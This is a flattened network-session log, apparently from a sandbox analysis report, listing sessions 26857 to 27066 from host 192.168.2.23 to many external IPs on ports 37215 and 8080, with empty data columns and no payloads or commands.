                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26857192.168.2.2337784197.19.205.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26858192.168.2.234467041.33.178.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26859192.168.2.2350840197.69.197.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26860192.168.2.23438544.172.239.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26861192.168.2.234765641.115.163.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26862192.168.2.2359276157.143.252.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26863192.168.2.2357078157.8.130.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26864192.168.2.2342904197.120.255.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26865192.168.2.234539641.48.157.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26866192.168.2.2340694197.154.227.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26867192.168.2.235115241.157.238.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26868192.168.2.23452102.255.81.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26869192.168.2.2354210197.190.99.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26870192.168.2.2340074157.120.102.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26871192.168.2.234737241.118.77.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26872192.168.2.2336250157.119.177.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26873192.168.2.233819441.234.55.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26874192.168.2.234625418.36.42.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26875192.168.2.2340334197.38.80.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26876192.168.2.234424041.245.227.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26877192.168.2.2347628157.98.3.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26878192.168.2.2339934197.204.154.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26879192.168.2.2334798197.153.92.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26880192.168.2.235436641.107.111.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26881192.168.2.2339842197.128.236.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26882192.168.2.2335464157.4.163.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26883192.168.2.2346466197.175.60.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26884192.168.2.2360266157.99.108.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26885192.168.2.235600432.46.33.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26886192.168.2.2351152198.105.116.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26887192.168.2.234941441.170.104.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26888192.168.2.2344446138.30.100.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26889192.168.2.2334896197.67.5.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26890192.168.2.233620041.237.48.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26891192.168.2.233292641.11.53.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26892192.168.2.2347704157.249.159.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26893192.168.2.234482441.189.210.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26894192.168.2.2343818157.253.234.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26895192.168.2.234428841.58.36.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26896192.168.2.236023441.250.118.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26897192.168.2.235976876.190.112.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26898192.168.2.235506841.24.28.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26899192.168.2.234512041.219.32.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26900192.168.2.2354094216.79.128.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26901192.168.2.2346356157.30.54.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26902192.168.2.234047641.43.26.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26903192.168.2.234641041.69.99.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26904192.168.2.2356874197.103.253.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26905192.168.2.2339482157.111.112.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26906192.168.2.236019841.151.22.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26907192.168.2.2340760132.30.119.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26908192.168.2.2343032197.225.203.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26909192.168.2.2343920198.144.38.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26910192.168.2.2354110197.50.53.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26911192.168.2.2335628197.113.118.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26912192.168.2.2358514197.210.216.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26913192.168.2.2357386157.15.111.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26914192.168.2.234974841.81.118.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26915192.168.2.2357344157.79.150.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26916192.168.2.234513641.239.96.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26917192.168.2.2340338197.144.150.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26918192.168.2.2341938197.185.93.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26919192.168.2.2342794197.30.217.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26920192.168.2.234841679.163.241.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26921192.168.2.233285241.42.147.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26922192.168.2.2353382197.204.157.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26923192.168.2.2342970197.111.138.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26924192.168.2.233971841.164.241.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26925192.168.2.234296041.228.108.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26926192.168.2.2347656157.232.191.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26927192.168.2.2359768197.113.216.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26928192.168.2.2352962149.12.49.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26929192.168.2.2357434216.233.48.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26930192.168.2.2357678144.188.53.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26931192.168.2.235564035.100.53.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26932192.168.2.2342484199.109.184.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26933192.168.2.2333244169.170.175.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26934192.168.2.2345096121.242.19.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26935192.168.2.235436694.163.45.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26936192.168.2.2342424209.222.169.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26937192.168.2.235732296.140.182.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26938192.168.2.235581425.171.63.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26939192.168.2.233936818.32.6.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26940192.168.2.234227462.235.210.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26941192.168.2.2335604206.133.229.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26942192.168.2.2352790161.50.214.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26943192.168.2.2351054162.81.189.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26944192.168.2.2352628115.119.177.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26945192.168.2.234336254.16.171.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26946192.168.2.233346874.201.255.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26947192.168.2.2357272121.124.48.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26948192.168.2.23601442.151.119.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26949192.168.2.233604074.213.53.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26950192.168.2.234860642.6.247.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26951192.168.2.2336658111.60.93.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26952192.168.2.235213841.127.15.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26953192.168.2.2340004157.234.180.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26954192.168.2.2338054218.130.151.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26955192.168.2.2353106157.62.121.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26956192.168.2.234499690.59.63.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26957192.168.2.2351838157.167.132.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26958192.168.2.2348570157.83.240.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26959192.168.2.2338316135.106.247.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26960192.168.2.235955641.179.144.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26961192.168.2.2357382157.4.12.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26962192.168.2.2351938136.236.29.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26963192.168.2.2353314182.126.254.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26964192.168.2.233997673.215.105.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26965192.168.2.234004698.219.105.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26966192.168.2.234785084.209.104.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26967192.168.2.2348554108.198.66.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26968192.168.2.235594417.100.67.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26969192.168.2.2344830153.183.225.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26970192.168.2.235844647.112.89.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26971192.168.2.234333071.174.127.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26972192.168.2.2341280134.122.74.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26973192.168.2.234945831.219.107.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26974192.168.2.233345882.66.246.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26975192.168.2.2334088115.30.222.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26976192.168.2.2346434103.165.57.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26977192.168.2.2332892201.144.249.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26978192.168.2.2345894132.204.87.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26979192.168.2.2347138175.138.203.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26980192.168.2.2348400201.253.79.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26981192.168.2.233729842.194.95.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26982192.168.2.2336262180.134.77.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26983192.168.2.234029813.151.53.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26984192.168.2.23471462.45.93.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26985192.168.2.234032283.104.54.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26986192.168.2.2353298202.62.186.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26987192.168.2.234199831.10.213.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26988192.168.2.2344464223.103.241.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26989192.168.2.2338920137.16.242.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26990192.168.2.2352716197.241.189.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26991192.168.2.234142065.51.83.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26992192.168.2.2339194151.192.87.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26993192.168.2.2337280142.103.79.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26994192.168.2.235256836.51.176.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26995192.168.2.233945096.139.184.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26996192.168.2.234647844.55.110.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26997192.168.2.2354822139.161.153.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26998192.168.2.235249224.133.83.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26999192.168.2.2334170218.99.245.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27000192.168.2.235897699.37.92.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27001192.168.2.2348074209.7.210.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27002192.168.2.2351876122.8.137.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27003192.168.2.23605561.60.80.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27004192.168.2.234434867.225.11.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27005192.168.2.234665242.200.235.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27006192.168.2.234292636.77.71.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27007192.168.2.2358664200.214.173.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27008192.168.2.2349120184.3.6.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27009192.168.2.235597660.229.217.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27010192.168.2.23402329.86.86.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27011192.168.2.2354130165.133.67.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27012192.168.2.2348264149.113.67.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27013192.168.2.234692895.100.233.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27014192.168.2.2359882134.129.234.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27015192.168.2.233368092.193.220.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27016192.168.2.23553768.103.134.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27017192.168.2.2355044120.169.126.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27018192.168.2.2351896204.179.123.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27019192.168.2.2351802159.94.66.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27020192.168.2.235530893.58.95.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27021192.168.2.235643872.224.112.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27022192.168.2.235515620.115.149.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27023192.168.2.233691017.51.120.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27024192.168.2.234614076.66.216.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27025192.168.2.2334546175.110.209.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27026192.168.2.2356280216.147.19.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27027192.168.2.2351698172.79.141.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27028192.168.2.2340778117.73.103.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27029192.168.2.236098266.149.80.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27030192.168.2.2347564118.30.189.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27031192.168.2.2357714169.34.194.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27032192.168.2.235440478.6.158.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27033192.168.2.234737673.124.127.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27034192.168.2.2339256153.40.188.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27035192.168.2.2343016166.62.85.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27036192.168.2.233334488.199.168.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27037192.168.2.233509888.19.255.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27038192.168.2.23385828.162.187.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27039192.168.2.2357586202.231.156.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27040192.168.2.2352556200.169.88.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27041192.168.2.235377431.154.63.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27042192.168.2.233823859.205.10.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27043192.168.2.234143457.53.192.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27044192.168.2.2339786179.18.137.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27045192.168.2.2335820164.176.141.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27046192.168.2.2349748167.225.67.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27047192.168.2.2336424126.147.83.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27048192.168.2.2343984136.250.156.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27049192.168.2.2344764148.14.16.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27050192.168.2.2332892203.119.51.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27051192.168.2.234903641.141.193.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27052192.168.2.2338586219.111.140.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27053192.168.2.235593017.75.233.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27054192.168.2.2341210143.110.196.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27055192.168.2.233838432.183.7.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27056192.168.2.2340470102.203.25.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27057192.168.2.2344502114.139.8.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27058192.168.2.2342670223.89.214.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27059192.168.2.2353530101.180.220.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27060192.168.2.2355746121.79.99.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27061192.168.2.234333898.234.227.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27062192.168.2.234190092.152.68.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27063192.168.2.234310094.4.191.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27064192.168.2.2352780109.69.137.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27065192.168.2.235475454.84.237.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27066192.168.2.235506642.245.179.348080
                                                        TimestampBytes transferredDirectionData


